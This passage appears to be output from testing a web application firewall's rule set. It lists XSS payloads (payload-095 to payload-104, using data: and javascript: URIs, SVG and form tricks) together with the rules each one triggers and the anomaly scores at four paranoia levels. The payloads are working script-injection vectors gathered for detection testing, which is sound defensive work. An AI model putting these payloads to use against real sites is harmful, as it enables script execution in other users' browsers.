941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 30
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 53
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 69
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 82
****** payload-095 ********
Payload:
payload=<script src="data:text/javascript,alert(1)"></script></a>
--- Paranoia Level 1 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 48
--- Paranoia Level 3 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 64
--- Paranoia Level 4 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 77
****** payload-096 ********
Payload:
payload=<svg><script href="data:text/javascript,alert(1)" /></a>
--- Paranoia Level 1 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 43
--- Paranoia Level 3 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 59
--- Paranoia Level 4 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 72
****** payload-097 ********
Payload:
payload=<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 30
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
Total Incoming Score: 63
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 84
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 97
****** payload-098 ********
Payload:
payload=<script>import('data:text/javascript,alert(1)')</script></a>
--- Paranoia Level 1 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 43
--- Paranoia Level 3 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 59
--- Paranoia Level 4 ---
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941110 PL1 XSS Filter - Category 1: Script Tag Vector
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 72
****** payload-099 ********
Payload:
payload=<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941280 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 30
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941280 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 63
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941280 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 79
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941280 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 92
****** payload-100 ********
Payload:
payload=<math><x href="javascript:alert(1)">blah</a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 43
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 56
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 69
****** payload-101 ********
Payload:
payload=<form><button formaction=javascript:alert(1)>XSS</a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 30
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 40
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 53
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 66
****** payload-102 ********
Payload:
payload=<form><input type=submit formaction=javascript:alert(1) value=XSS></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 30
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 38
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 51
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 64
****** payload-103 ********
Payload:
payload=<form action=javascript:alert(1)><input type=submit value=XSS></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 33
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 46
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 59
****** payload-104 ********
Payload:
payload=<isindex type=submit formaction=javascript:alert(1)></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 30
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
